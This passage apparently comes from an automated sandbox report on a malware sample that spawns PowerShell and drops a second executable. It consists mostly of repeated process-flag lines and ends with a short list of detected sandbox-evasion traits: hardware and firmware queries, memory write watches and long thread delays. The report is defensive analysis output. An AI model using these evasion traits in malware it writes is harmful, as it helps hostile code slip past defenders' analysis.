                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeMemory allocated: 4690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeWindow / User API: threadDelayed 4979Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeWindow / User API: threadDelayed 1732Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6083Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3652Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7901Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1783Jump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeWindow / User API: threadDelayed 596Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420Thread sleep time: -21213755684765971s >= -30000sJump to behavior
